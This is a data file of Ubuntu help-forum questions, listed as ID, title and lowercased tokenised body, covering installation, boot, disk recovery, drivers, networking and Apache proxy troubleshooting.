386550	is norwegian language supported ?	can i get norwegian language support in ubuntu ? i do n't want to get an operating system that does n't support my language . i also wonder if i can type in norwegian , can i do that ? can i install ubuntu on a computer which already runs windows ? when i download items from the internet , must i choose the linux version or is there anything else that i should check before i download packages from the internet for installation in ubuntu ?
386553	how to upgrade openssh version in ubuntu 10.04	i need to upgrade the openssh version present in my ubuntu server to a higher version . please provide me steps to do so .
386557	knox-it flash drive unable to unlock	how do i unlock my knox-it flash drive . i had forgotten the code and tried all sorts , i guess now its locked . if i plug it into a usb port i ca n't see it on my computer .
386560	ca n't boot iso from usb unetbootin	i was trying to install linux mint and a few other os 's through unetbootin . ( xubuntu 12.04 ) the iso 's burned alright , but when i tried to boot them up , i got the message : `` non-system boot disk . press any key to reboot . '' i 've done this several times , and i ca n't figure this out , so please help if you can .
386562	xfs file system fails - ca n't read superblock	after this ( iomega home media disk corruption - data recovery help asked ) problem solved ... i have a new one.. i 'm trying to understand why my iomega home media stopped working , and need for that to see what happened on the os logical volume . for reading purpose , i will remind having a seagate 1to hard drive mounted /dev/sdc , running gpt , soft raid ( on one disc : wonder why raid ? ) , with lvm2 volume groups that has a 4gb partition , a 16gb os partition ( i need to access ) and a 921gb i have managed to gain access to ... attacking the os partition , i tried an ubuntu automount that ended with this error error mounting /dev/dm-1 at /media/ubuntu/6b08ba57-d9c9-46bc-af28-e57b222bad6d : command-line `mount -t `` xfs '' -o `` uhelper=udisks2 , nodev , nosuid '' '' /dev/dm-1 '' `` /media/ubuntu/6b08ba57-d9c9-46bc-af28-e57b222bad6d '' ' exited with non-zero exit status 32 : mount : /dev/mapper/md0_vg-vol1 : ca n't read superblock googling this error leads to make an file system check which can be done only with xfs_check / xfs_repair . but problems continue here as none of these two commands work : ubuntu @ ubuntu : / $ sudo xfs_check /dev/md0_vg/vol1 xfs_check : read failed : input/output error xfs_check : can not init perag data ( 5 ) xfs_check : read failed : input/output error xfs : failed to find log head error : can not find log head/tail , run xfs_repair ubuntu @ ubuntu : / $ sudo xfs_repair /dev/md0_vg/vol1 phase 1 - find and verify superblock ... superblock read failed , offset 4293918720 , size 131072 , ag 1 , rval -1 fatal error -- input/output error what can i do to solve this and recover data on this os partition , or even better restore partition to an active state ... is the hard disk failing ? edit : to complete informations , here is the mtab : root @ ubuntu : /home/ubuntu # cat /etc/mtab /cow / overlayfs rw 0 0 proc /proc proc rw , noexec , nosuid , nodev 0 0 sysfs /sys sysfs rw , noexec , nosuid , nodev 0 0 udev /dev devtmpfs rw , mode=0755 0 0 devpts /dev/pts devpts rw , noexec , nosuid , gid=5 , mode=0620 0 0 tmpfs /run tmpfs rw , noexec , nosuid , size=10 % , mode=0755 0 0 /dev/sdd1 /cdrom vfat rw , relatime , fmask=0022 , dmask=0022 , codepage=437 , iocharset=iso8859-1 , shortname=mixed , errors=remount-ro 0 0 /dev/loop0 /rofs squashfs ro , noatime 0 0 none /sys/fs/cgroup tmpfs rw 0 0 none /sys/fs/fuse/connections fusectl rw 0 0 none /sys/kernel/debug debugfs rw 0 0 none /sys/kernel/security securityfs rw 0 0 tmpfs /tmp tmpfs rw , nosuid , nodev 0 0 none /run/lock tmpfs rw , noexec , nosuid , nodev , size=5242880 0 0 none /run/shm tmpfs rw , nosuid , nodev 0 0 none /run/user tmpfs rw , noexec , nosuid , nodev , size=104857600 , mode=0755 0 0 none /sys/fs/pstore pstore rw 0 0 systemd /sys/fs/cgroup/systemd cgroup rw , noexec , nosuid , nodev , none , name=systemd 0 0 gvfsd-fuse /run/user/999/gvfs fuse.gvfsd-fuse rw , nosuid , nodev , user=ubuntu 0 0 /dev/sda2 /media/ubuntu/70e04ba9e04b73fe fuseblk rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 0 0 /dev/mapper/7ebf5eba_vg-lv28ab8112 /media/ubuntu/594eab64-3663-4ace-bbb0-aebe31772a0d xfs rw , nosuid , nodev , uhelper=udisks2 0 0 /dev/sda1 /media/ubuntu/78ae5dc4ae5d7b96 fuseblk rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 0 0 /dev/sdb1 /media/ubuntu/7ea4e8dba4e896c5 fuseblk rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 0 0 /dev/loop1 /media/ubuntu/f24d667d-d64f-6540-b023-4f1d53e8c97c ext2 rw , nosuid , nodev , uhelper=udisks2 0 0 /dev/mapper/md0_vg-bfdlv /media/ubuntu/b54e7759-4a09-4514-bc1d-f0dbd8570896 ext2 rw , nosuid , nodev , uhelper=udisks2 0 0 hope it help understanding problem ...
386565	turn off nodmraid ? ( for installation )	okay , i 've installed ubuntu on a 4gb usb ( livesession i think you people will call it ) when i go to install ubuntu onto my 16gb usb from the livedisk , i followed some instructions for setting up my partitions then once i finished one of the partitions failed or something , then when i tried to redo it a window came up with the partman crash error i read around and people say something about pressing f6 or something on the `` initial installation '' to turn off dmraid or something e.e but none of them explain in detail what screen to do it on or if i 'm even supposed to press f6 can anybody explain in detail how i do this ? i 've tried pressing f6 when i first boot up the bios but nothing , i 've tried on my unetbootin screen as my usb is loaded , i 've tried spamming the key during installing ubuntu but nothing ... . at the moment i 'm reinstalling ubuntu on my 4gb incase it 's been corrupted or something , can anybody help ?
386567	apt-cache show specific dependencies	it would appear that it specifies that the following dependencies are installed : 2.4.6-2ubuntu4 2.2.22-1ubuntu1.4 2.2.22-1ubuntu1 why does the apache2 package consist of sub dependencies ( apache2-bin ) provided by dependencies ( 2.2.22-1ubuntu1.4 , etc ) that appear to be of different versions of apache ? https : //launchpad.net/ubuntu/+source/apache2 specifies that the above packages are in fact disparate packages of disparate versions . is this just a peculiarity of the deployment of this backport ? apt-cache showpkg specifies : 2.4.6-2ubuntu4 - lsb-base ( 0 ( null ) ) procps ( 0 ( null ) ) perl ( 0 ( null ) ) mime-support ( 0 ( null ) ) apache2-bin ( 5 2.4.6-2ubuntu4 ) apache2-data ( 5 2.4.6-2ubuntu4 ) www-browser ( 0 ( null ) ) apache2-doc ( 0 ( null ) ) apache2-suexec-pristine ( 16 ( null ) ) apache2-suexec-custom ( 0 ( null ) ) ufw ( 0 ( null ) ) apache2-utils ( 0 ( null ) ) ssl-cert ( 0 ( null ) ) apache2.2-common ( 0 ( null ) ) apache2.2-common : i386 ( 0 ( null ) ) apache2.2-common ( 0 ( null ) ) apache2.2-common : i386 ( 0 ( null ) ) apache2 : i386 ( 0 ( null ) ) 2.2.22-1ubuntu1.4 - apache2-mpm-worker ( 21 2.2.22-1ubuntu1.4 ) apache2-mpm-prefork ( 21 2.2.22-1ubuntu1.4 ) apache2-mpm-event ( 21 2.2.22-1ubuntu1.4 ) apache2-mpm-itk ( 5 2.2.22-1ubuntu1.4 ) apache2.2-common ( 5 2.2.22-1ubuntu1.4 ) apache2 : i386 ( 0 ( null ) ) 2.2.22-1ubuntu1 - apache2-mpm-worker ( 21 2.2.22-1ubuntu1 ) apache2-mpm-prefork ( 21 2.2.22-1ubuntu1 ) apache2-mpm-event ( 21 2.2.22-1ubuntu1 ) apache2-mpm-itk ( 5 2.2.22-1ubuntu1 ) apache2.2-common ( 5 2.2.22-1ubuntu1 ) apache2 : i386 ( 0 ( null ) )
386568	i want to uninstall ubuntu 12.04 lts and install windows 8	i want to uninstall ubuntu 12.04 lts and install windows 8 via usb . i have a bootable usb stick and boot order is set to boot from the usb stick but it takes me directly to the gnu grub screen instead with no option of selecting the usb . any idea on what needs to happen ?
386569	how to make the shutter top panel icon to be permanent ?	i 'm running ubuntu 13.10.whenever i open the shutter application , a shutter icon was displayed on the unity top-panel.but it remains for sometime . but my question is how to make this icon to be displayed permanently on the top-panel after i rebooted my pc .
386570	i am not able to download any plugin for audio or video on ubuntu 13.10	i recently installed ubuntu 13.10 . and for some reason i am unable to download any plugin automatically . i never had this problem before . here is an image what rhythmbox or the default video player says while downloading plugins . any help will be appreciated . screenshot
386578	update ubuntu 12.04.3 lts updated version	hello any one help me out i have using ubuntu 12.04.3 lts in my laptop.in my college we are using lan connection to access internet.through this lan server providing squid proxy serve to access internet.but the main problem is every time it asking username and password to access internet in firefox or other browsers but we can not access internet other than browsers any way to access internet throughout the system to update system softwares
386587	can i use both ubuntu and windows 8 when i download online ?	if i download ubuntu on my windows 8 , is it going to completely replace the windows os in the sense that i can not use windows 8 anymore on my laptop ?
386589	ubuntu 12.04 - install 64 bit version instead of already installed 32 bit - system is not booting off cd rom	i had already installed the 32 bit version of 12.04 ubuntu ( new install 2 weeks back ) to test it out and now want to re-install the 64 bit version to maximize my pc processing power with quad core . issue : when i am booting up from dvd , i am not getting the option for fresh install .
386590	avm fritz ! wlan-stick on ubuntu 13.10	i have ubuntu 13.10 , just installed , and a avm fritz ! wlan-stick + a cd with software and drivers - for windows ! now i 'd like to use this stick with my ubuntu . the ubuntu-wiki seems to know only one way to achieve this : the ndiswrapper-packages . but with reading the big warning they added to this page , i realized why my computer did n't work the last time : the ndiswrapper does not work for ubuntu 12.04 and higher . which other ways do you know to get this running ? as i know you might be interested in the output of sudo lsusb : bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 062a:0000 creative labs optical mouse bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 002 : id 13fe:4100 kingston technology company inc . bus 003 device 004 : id 057c:6201 avm gmbh avm fritz ! wlan v1.1 [ texas instruments tnetw1450 ] bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub if you need any further information , feel free to leave a comment and i 'll add it ! edit 12/05/2013 : just found a driver provided by avm themselves : http : //download.avm.de/cardware/fritzwlanusb.stick/linux/suse.10.2 downloaded it and tried to install , but my terminal threw some errors and left installation . cp : can not stat 'fwlanusb.ko ' : no such file or directory how can i get this working , or is there another 3rd-party driver available ?
386592	enlarge/zoom everything ?	is there anyway to simply enlarge everything ? with higher resolution screens everything becomes so tiny , i managed to increase font size with advanced settings , but that only can go so far before fonts too large for the borders that they are in . also icons such as close/minimize/maximize do n't change like this . there should be a setting in appearance ie that simply enlarges everything at will . i know about compiz ' desktop zoom feature but that is not what i 'm looking for , i just want the screen as is , just everything bigger without losing sight of anything .
386594	installing ubuntu 32bits on windows 8 thats runs on 64bits	please how do i install ubuntu 12.04 on my brand new windows 8 64 bits system . i have been trying to install it but when it tries to restart , it shows file not found
386598	nomachine nx client v4 and lightdm	i am trying to connect from an ubuntu 13.10 laptop with nomachine nx v4 to an ubuntu 12.04 system with nomachine nx v3.5 i can successfully connect to the machine , but if i try to connect to the physical display ( described from nomachine as `` user lightdm '' ) i receive the error message `` the session negotiation failed . error : can not share session of user : lightdm '' . i tried to work around this issue by spawning a new session with a gnome virtual desktop : the desktop spawns but as soon as i click anywhere inside the desktop nomachine crash with no outputs whatsoever , the window simply closes . is there a way to make lightdm `` open '' to nomachine sessions ?
386600	i ca n't shutdown my laptop using ubuntu	i am now using ubuntu 13.10 with dual boot on window7.when i shutdown from ubuntu , my laptop restarts.i shutdown from window.please solve my problem.help me .
386601	how can i tweak launcher and menu bar behavior ?	i mostly like unity , although some things go too far in the macos direction for my liking and other things are simply not great usability practices that i would like to fix . two things in particular kind of irk me a lot : i would like the menu bar for applications to be in the application itself and not in the top panel . i would also like it to be always displayed . i would like the position of locked launcher icons to stay consistent . sometimes when i run another application , it will rearrange icons which makes me have to think too hard about what keyboard shortcuts to use . if you have a general resource to share for how to make changes to unity that would also suffice .
386604	restoring deja dup on newly formatted machine	i backed up my 12.04 lts ubuntu machine using the deja dup ftp service . i then formatted the hard drive , and reinstalled a fresh 12.04 lts ubuntu os . now i want to restore from the backup , but keep getting errors when trying deja-dup -- recover and filling out all fields in the gui appropriately . ( i am able to get to the ftp server by doing ftp [ ftp_server ] , then providing the user name and then providing the password . ) does deja dup store files required for a restore on the machine that is being backed up ? if so is it possible for me to restore/retrieve those files ? is there another reason my deja dup restore might be failing ? i should also note that i tried going under deja dup and doing the restore with duplicity using duplicity -- file-to-restore [ remote_file ] [ ftp_server ] [ local_file ] and that failed as well . however , when i do duplicity list-current-files [ ftp_server ] i get a list of all my files . but i get this at the head of that commands post : '' ncftp version is 3.2.5 local and remote metadata are synchronized , no sync needed . warning , found signatures but no corresponding backup files warning , found incomplete backup sets , probably left from aborted session last full backup date : none '' the above dump appears to show the backup had failed . however , i got a successful response from deja dup after doing the backup initially . i know deja dup is just a gui for duplicity , but could there be some reason that a file backup would work and be restore-able with deja dup and not duplicity ? thank you in advance for any help .
386606	how to i use an external wifi adapter with the internal one disabled ?	the internal one has a short on the switch and i want to use an external one . the os turns off all wifi adapters when the switch is off and when the wifi switch is on then all the wifi adapters on the laptop are active .
386611	how can i return non-zero if upstart job fails to start ?	how can i return non-zero from an upstart job if it fails to launch the first time ? i suspect that respawn might be the culprit here , but perhaps not . the reason i want respawn is because myscript.py is a serivce that can exit for two separate reasons : bad configuration . ( fails at startup ) unexpected exception when processing data . ( runtime failure ) so i 'd very much like to keep the second behavior , without the first if at all possible . description `` myjob '' respawn start on runlevel [ 2345 ] stop on runlevel [ ! 2345 ] script exec python /usr/local/bin/myscript.py end script anyway , i could live with the dual behaviors if the initial restart or start commands return non-zero when the script exits within a small window . how can i do this ?
386612	sftp connection successful , but ca n't upload files	i followed this guide . i am using ubuntu server and filezilla , and i can succesfully connect . however , i can only read and download files , not upload or edit them . if i change the file permissions to either 777 or 766 , filezilla can no longer connect . anyone know what i 'm doing wrong ?
386614	sound problem in kubuntu 13.10	i have a sound problem on kubuntu 13.10 which i find rather annoying . the problem comes in two stages . by default , i can not listen to skype . so , following a suggestion similar to this one , i added the usual tsched=0 to the line load-module module-udev-detect tsched=0 in the file /etc/pulse/default.pa . at this point , skype started working well . but this broke the audio on my netflix connection ( through wine & firefox ) , which worked flawlessly earlier on . i quickly discovered that , getting rid of the tsched=0 addition , restored a correct sound on netlfix ( via wine- > firefox ) , but again compromised the audio on skype . in the end , i have a major and a minor question . are there settings that accommodate both skype and netflix ? if the answer to the previous question is no , is there at least a way , complex though it may be , to restart pulseaudio without rebooting the pc ?
386618	missing 50gb on my 100gb harddrive	i have a 128gb harddrive formatted with the btrfs . however , for some reason i 'm missing around half of the disk space . do any of you have any idea of how to fix it ? see this screenshot for details
386623	increase allowed memory for ubuntu	i 've installed ubuntu using the windows installer , and lately i notice the computer runs pretty slow while i 'm using ubuntu , and i guess the reason for this is the amount of memory allowed for ubuntu . i 'd like to know whether it 's possible to increase the allowed memory for ubuntu without reinstalling it . moreover , i 'd like to know what influence does increasing the allowed memory have ? output of free-m : total used free shared buffers cached mem : 3920 3215 704 0 1083 1307 -/+ buffers/cache : 3920 824 3095 swap : 255 0 255
386627	how to schedule with ubuntu planner using resources	i 'm using ubuntu 's 'planner ' project management software for creating gantt charts . i 'd like to know how to schedule things based on resources and priorities . for example , if i create two tasks and assign a single resource to each one at 100 % utilization , i 'd like planner to reschedule the lower priority task later than the higher priority , so that they do not overlap . the documentation mentions that this is possible : `` planner now includes an experimental simple priority based scheduling feature . to use it , planner must be built with the feature enabled . this feature will divert resources from one or more tasks to a high priority task , and reschedule the tasks accordingly . '' it seems that the version in the 13.10 repository is not built with this enabled . does anyone know what flags to set to enable it ?
386629	what are the default $ path values ?	on mac os x , the default $ path values are : /usr/bin : /bin : /usr/sbin : /sbin : /usr/local/bin what are the default values on linux ?
386631	forwarding html in kmail	kmail is not respecting html formatted emails when i forward them . in templates , % forcedhtml just removes the message in the editor . how to ?
386638	unable to boot on windows after installing ubunu	i just intalled ubuntu ( the real one ) and now i am unable to run on my previous win7 . as far as i know i did n't overwrite the windows partition . if i try to launch windows it breaks down directly ( with safe mode too ) . windows is n't able to start ( i even lost access to the f11 menu ) and asks me to insert a boot device ( which i do not have sine it was pre-installed ) . i followed some tipps and installed boot_repair which gives the following output http : //paste.ubuntu.com/6525891/ ( some efi detected ) . altough i am a newbie i presume the error is coming from the ubuntu booter . i am completely lost so thank you for any help : )
386640	how to split an iso and join them together ?	i have an iso file about 24 gb . i want it to move to the other pc . my pendrive is about 16 gb . is there any way i can part the iso and again join them together . this oc is ubuntu and other one is windows 7 .
386641	ubuntu 13.04 makes me restart every time the internet is down	i have ubuntu 13.04 , and the same thing happened with ubuntu 13.10 . every time the internet is slow or down , the system is very slow . i need to restart the notebook or wait for about 15 or 20 minutes for everything to be right again . i have a very bad internet provider . besides , the cpu is very hot during these events . it does not happen if i do n't go to youtube , or play flash games ( e.g . on facebook ) . if i avoid these things , the connection and the system remain fine .
386642	how to set up an old laptop as a wireless terminal to the desktop	i have searched countless phrases to find an answer and ca n't quite figure this one out . it is to my understanding that ( as it was many moons ago at universities and the like ) you can still use one central setup to do the processing/video/account/file management and have terminals to access it that merely function as a screen , keyboard , and mouse which to provide input back to the main pc . ssh is an easy way to do this from a command line point of view , but i have a few old laptops that would function excellent as terminals , while leaving the load to my self-proclaimed super computer ... ex : my significant other has an old dell mini 10 ... the thing is total garbage , even for surfing the web , even after a factory reset ... but it does have a decent processor and a gig of ram . i was thinking to do a minimal ubuntu install and then lxde or e17 or the like for a de ... but what might be better is to keep it a command line variant that can let the desktop take the burden and just use it as a terminal ... this would benefit me more , i think , because it would allow the laptops to run smoothly ( i have a few of them i 'd like to revive through this cause ) but more so i can manage all user accounts , homes directories , and installed applications right from one system ... i am by no means a linux pro , but even if no one has time to tell me step by step , even a push in the right direction with which programs to use would mean a lot to me . i 'm guessing this goes a step beyond ssh and involves so kind of setup with an x server , but again , i 'm guessing = ) here 's what i 'm looking for summarized : i would like to , from any ubuntu device , have it set up so that when booted , it will connect to the desktop . then they can proceed to use the laptop as a terminal and connect to the desktop as if they were sitting in front of the screen/keyboard/mouse attached to it . thanks in advance for any help !
386651	how can i turn off animations in ubuntu 13.10 ?	i 'm having a problem with libreoffice and ubuntu 13.10 . namely , whenever i try to access different calc spreadsheets by ctrl-clicking the calc icon on the left toolbar , the system becomes completely unusable for several seconds while some animation of the windows rearranging themselves plays . i would like to either : disable that animation entirely ( apparently not allowed once unity2d became merged with unity ) be able to alt-tab between windows rather than between applications honestly , i have no desire to have a fancy 'lickable ' interface ; i do n't want to use a mac . how can i turn all of these helpful 'features ' ( ie , time-wasting animations ) off ?
386652	ubuntu - one process running - tons of memory used	i 've installed ubuntu using the microsoft windows installer , and it 's running pretty slow . i 've got 3.8 gb ram on my computer , and by running free -m i 'm getting the following results : total used free shared buffers cached mem : 3920 3440 479 0 1174 1457 -/+ buffers/cache : 809 3110 swap : 255 0 255 only 479 out of 3440 mb is free , while to only process running at the moment if firefox . i 've changed the swappiness to 10 , but still no change is seen . i 'd like to know why so much memory is used and how could i fix it and possibly make my computer run faster . any solution would be grateful , thanks in advance !
386653	can ubuntu 's x work with thunderbolt displays ?	i have a mac mini with ubuntu running on a usb thumb drive . the boot up secquence happens and output for efi and ubuntu console is directed to thunderbolt monitor . when x starts , the thunderbolt monitor goes dark and the hdmi monitor is turned on with the purplish graphical boot dots . after system is up , only the hdmi monitor is detected . can ubuntu work with thunderbolt ? how ? how do i go about mucking with x config ? the xorg.conf seems to be gone and replaced by automatically generated files sprinkled on the filesystem . ubuntu @ ubuntu : ~ $ cat /etc/*release distrib_id=ubuntu distrib_release=13.10 distrib_codename=saucy distrib_description= '' ubuntu 13.10 '' name= '' ubuntu '' version= '' 13.10 , saucy salamander '' id=ubuntu id_like=debian pretty_name= '' ubuntu 13.10 '' version_id= '' 13.10 '' home_url= '' http : //www.ubuntu.com/ '' support_url= '' http : //help.ubuntu.com/ '' bug_report_url= '' http : //bugs.launchpad.net/ubuntu/ '' ubuntu @ ubuntu : ~ $ xrandr screen 0 : minimum 320 x 200 , current 1280 x 1024 , maximum 32767 x 32767 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) hdmi2 disconnected ( normal left inverted right x axis y axis ) hdmi3 connected primary 1280x1024+0+0 ( normal left inverted right x axis y axis ) 376mm x 301mm 1280x1024 60.0*+ 75.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 dp2 disconnected ( normal left inverted right x axis y axis ) dp3 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) ubuntu @ ubuntu : ~ $
386654	why spelling checker and grammer checkers are not there in libreoffice	why the libreoffice dose not detect any wrong words or wrong grammar , even i followed and i did what they mentioned in this site but no result.can any one know how get them
386655	netbeans 7.0.1 does n't work	i installed netbeans 7.0.1 and mysql in ubuntu 13.04 and the first time netbeans start but does n't create projects . so i close netbeans and restarted but does n't star . there 's is a solution ? i need to work with those programs ... thanks
386659	tor browser does n't show any window	i have tor browser installed on my ubuntu 12.04 . it was ok first , but now it does n't show a window , but opens a firefox window after a couple of seconds . if i close the browser , it does n't close tor . so if i want to run it again , it shows an error message and i have to shut it down from system manager . what do i do ? . . .
386666	mount point for multiple ext4 partition	i ca n't find any related question and answer that will satisfy me on my quest . all i see that people telling to create a ext partition with mount point '/ ' and a swap space . but i want to create multiple ( 3 ) ext partitions . i just want to keep them separately so that i can access them individually . i used ext4 as partitioning format and provide mount point '/ ' to one partition and left other partitions mount point without selecting anything . during next step it provide a warning message for those partitions . after installation now i can see them individually . still i do n't put any data on those partitions . i am just thinking is it a bad idea not to provide any mount point ? and for multiple ext4 partitions is it ok ? is there any performance problem may occur on this matter ?
386669	how to create an android html app easily ?	what is the easiest way to create an android html app ? in windows i can create it by using dreamweaver and phonegap . how about ubuntu 13.10 64bit ? thanks
386673	`` unable to resolve host '' each time i run `sudo`	i installed ubuntu 13.04 headless server into a cubieboard , and whenever i type sudo it says `` unable to resolve host '' . i saw a few posts related to this and they suggested changing . etc/hosts , that did n't work as well .
386678	i get a weird message each time i open the shell	once i open the terminal , the following message appears : a.a is watching you how could i get rid of this message and where does it come from ?
386683	how to run libreoffice calc	when libreoffice calc is install in simdock libreoffice calc can not open how can you write in the correct command . thanks .
386690	cinnamon wo n't run on *ubuntu 13.10	i tried to install cinnamon on my kubuntu 13.10 , just upgraded from 13.04 without problems . there is this ppa : ppa : gwendal-lebihan-dev/cinnamon-stable also tried to use the non-ppa-versions ( those shipped with *ubuntu ) . i get the error message from within lightdm : unable to load session 'cinnamon' or unable to load session 'cinnamon2d' i also deleted my gnome settings ( all files/folders from my home dir ) and reset cinnamon by using this command line : gsettings reset-recursively org.cinnamon both did n't help . how do i get cinnamon up and running ? i 'm fine with debugging . would it be possible i did not upgrade my amd graphics driver properly ? thanks in advance ! ben ps : my primary desktop is kde , so i have no problems with unity not running - it is n't running anyway .
386693	how to get all gfx memory out of an hd 7850	i have a radeon hd 7850 card in my linux box that runs ubuntu 13.10 . this card is supposed to have 2gb of memory . when booting it under some windows , i can run certain gfx intensive apps just fine . however on linux this did not work . so i checked how much memory is actually available in linux , and apparently it is only 256mb . presumably this is the cause of me not being able to run gfx intensive apps on my linux , or at least related to it . just installed the latest catalyst driver ( the proprietary one ) , still the same issue . is it possible to have my linux actually make proper use of the card , and if so , how ?
386694	want to access local ubuntu server to get files to hosting	i do have local ubantu server with files , i need to access those files and upload them to my website hosting . how can i do it ? -thank you
386696	lenovo x1 carbon touchpad accuracy	i just installed ubuntu 10.04 on my x1 carbon . everything seems to work well except the touchpad . it seems that every time i move the curser to click on something , it jumps few pixels away . i accidentally closed windows i 've been working on for that reason . otherwise , scrolling and tapping is working just fine . i came cross this page which i think identify my issue : http : //code.technically.us/post/50837506478/senistive-touchpads-and-ubuntu . however , i ca n't understand what the author means by `` softlink this file into : '' . does anyone have this issue or even a solution ? maybe try to explain that page in understandable way ?
386697	ethernet cable not being detected in ubuntu 13.10	i have windows 8 ( 64 bit ) and ubuntu 13.10 ( 64 bit ) installed on my system . my system has 6gb ram . the ethernet cable is not being detected in ubuntu . very few times , it gets detected but that is after half to one hour . can anyone provide a solution . thanks in advance .
386700	questions about software wine ?	wanted to say that is all the software on windows wine is installed ? do the software can be used such as : adobe dreamweaver cs6 , visual studio 2012 on wine installed ?
386704	fingerprint ubuntu 12.04 on lenovo b570	i have installed ubuntu 12.04 64 bit . i have set up all except this damned hardware . in my lenovo b570 the driver needed for work i choosen the correct one for my system , i set up all . but when i try to register my fingerprint the program accepts only the very first try . on the second - freezes hard . please help . p.s . i have tried to set up all with this manual : https : //launchpad.net/~fingerprint/+archive/fingerprint-gui thanks !
386707	how to access ruby on rails assets from a host machine	i am running a ruby on rails server on an ubuntu virtualbox guest machine . i can access the local server from my host machine by setting the ubuntu network adapter to bridged . my app 's hmtl is loading ok , but the assets e.g . the images are not .
386709	airmon-ng ca n't find wlan0	when i run this command sudo airmon-ng start wlan0 . i have this : found 5 processes that could cause trouble . if airodump-ng , aireplay-ng or airtun-ng stops working after a short period of time , you may want to kill ( some of ) them ! -e pid name 860 avahi-daemon 861 avahi-daemon 929 networkmanager 946 wpa_supplicant 11627 dhclient process with pid 11627 ( dhclient ) is running on interface eth1 interface chipset driver eth1 unknown wl - [ phy0 ] i ca n't find wlan0 to make it monitor : mon0
386714	restart service minutes after startup	i have a situation where i 'm looking to run a service restart a couple minutes after startup . the particulars as to why are as follows , but the essense of my question is basically captured in in that first sentence ; how might i automatically execute a command some time after startup ? the details : i 'm using boinc in conjunction with my cuda-enabled graphics card . it all works great , except for the fact that when i start up my computer fresh i get a gpu missing error in the boinc manager . this is easily fixed with a sudo service boinc-client restart but this needs to be done whenever the computer starts up in order to engage the gpu . my hunch is that boinc is starting before the necessary graphics card drivers load . ( seems reasonable , right ? ) anyway , if you know a more elegant way than i 've proposed above to resolve this , i 'm all ears but , as far as i 'm concerned , restarting boinc like 2 minutes after the computer starts up is good enough for me . thanks for any insight !
386718	ubuntu 12.04 does n't boot all the time	i have ubuntu 12.04 installed on an asus notebook ( x201e ) but it does n't boot all the time.it usually gets stuck with a purple screen on normal boot or a black screen in the recovery mode and during such time the led indicator for hdd access does not blink.on rare occassions it boots fine except for the message could not write bytes broken pipe which flashes during the boot . further it boots without fail when any usb device is attached to any one of the three usb ports . so its not really a problem as all i have to do is attach some usb device and everything works fine but still i would like to know why this is happening . how to fix this ?
386719	unable to boot usb 3 on msi z68a mobo	i have a seagate usb 3 hdd . i am able to boot via usb 3 on a toshiba satellite intel chip laptop . however , when using the usb 3 ports on my desktop 's msi z68a-g55 motherboard , i am unable to boot to usb 3 , only usb 2 . i checked the bios and they are configured to enable the usb 3 devices . however , the hdd is still not found . the os installed is ubuntu 13.10
386721	made an executable .jar , runs on windows but ubuntu does n't run it ?	i made the following small file with eclipse , using the swt library : //all the imports public class classtest { public static void main ( string [ ] args ) { display display = new display ( ) ; shell shell = new shell ( display ) ; shell.setsize ( 300 , 200 ) ; shell.settext ( `` button example '' ) ; //shell.setlayout ( new rowlayout ( ) ) ; button button = new button ( shell , swt.push ) ; button.setlocation ( 20,20 ) ; button.setsize ( new point ( 70,30 ) ) ; //new point seems to be optional ? button.settext ( `` buttontje `` ) ; shell.open ( ) ; while ( ! shell.isdisposed ( ) ) { if ( ! display.readanddispatch ( ) ) display.sleep ( ) ; } display.dispose ( ) ; } } the .jar i made out of it runs totally fine on windows . now i installed java on ubuntu using the following commands ( from http : //www.ubuntugeek.com/how-to-install-oracle-java-7-in-ubuntu-12-04.html ) : sudo add-apt-repository ppa : webupd8team/java sudo apt-get update sudo apt-get install oracle-java7-installer java seemed to be installed fine . i run the file , but nothing happens . an other program of me , though , using only jbuttons and no swt library , does run . do i need to install the swt library on the target platform to make it work ? but how would i install it ? i thought the swt library would be included in the .jar so that it would run the swt layout on every platform , as long as java is installed .
386722	marvell wifi issue on surface pro 2 with 64 bit ubuntu 14.04	given surface pro 2 has the same wireless device as that of surface pro 's , i followed the instructions in this question . the problem is , after replacing the original firmware files with the ones posted in the above link , ubuntu still does n't recognise an `` mlan0 '' device . was wondering if anyone else has stumbled upon the same issue ? is there a workaround ? will it be solved if i update my kernel to 3.12.3 ? update : moving to 3.12.3 kernel did n't resolve the problem , a bug report mentions that this is fixed in the raring kernel , but i still do n't see the device . update 2 : issue persists in ubuntu 14.04 and kernel 3.13.0-24 . the above mentioned fix does not work . opened a bug report on launchpad .
386726	how do i dual boot android and ubuntu touch ?	i 've asus tranformer prime tf201 64gb with android 4.1.1 not rooted . i 'd like to install ubuntu touch for tablet as second os . is it posible ? how to do it ?
386728	apache mod_proxy images problem	i got mod_proxy working fine , but all the images and css files are broken . i tried setting up proxy_html but i have no clue how to get it working . this is my apache file : < virtualhost *:80 > serveradmin webmaster @ monstercraft.org documentroot /var/www/ < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined alias /doc/ `` /usr/share/doc/ '' < directory `` /usr/share/doc/ '' > options indexes multiviews followsymlinks allowoverride none order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory > proxyhtmlinterp on proxypass /test http : //127.0.0.1:9002 proxypassreverse /test http : //127.0.0.1:9002 < /virtualhost > this is the part where i have setup the reverse proxy : proxyhtmlinterp on proxypass /test http : //127.0.0.1:9002 proxypassreverse /test http : //127.0.0.1:9002 but it 's still not working , when i got the domain.com/test , it will load the page , but all the image & css files are broken cause they should be loading form domain.com/test/css.css but they are trying to load form /domain.com/css.css 